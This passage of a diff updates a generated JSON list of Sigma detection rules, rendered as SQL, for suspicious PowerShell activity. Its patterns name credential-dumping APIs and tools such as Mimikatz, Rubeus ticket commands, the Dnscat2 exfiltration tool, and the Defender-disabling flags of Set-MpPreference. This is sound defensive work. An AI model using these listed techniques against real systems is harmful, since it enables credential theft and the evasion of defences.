"posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", - "falsepositives": [ - "Legitimate use of the library" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" - ], - "filename": "posh_ps_download_com_cradles.yml" - }, - { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", 
"tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -5917,427 +5775,462 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "title": "Suspicious IO.FileStream", + "id": 
"70ad982f-67c8-40e0-a955-b920c2fa05cb", "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "WMIC Unquoted Services Path Lookup - PowerShell", - "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. 
The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_wmi_unquoted_service_search.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + }, + { + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE 
'%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Unknown" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "status": "test", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" + }, + { + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "status": "test", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", - "author": "frack113", + "title": "Dnscat Execution", + "id": 
"a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "author": 
"frack113", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "status": "experimental", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], 
"falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "status": "experimental", + "description": "Detect use of X509Enrollment", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' 
ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE 
(EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "status": "experimental", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1497.001" + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
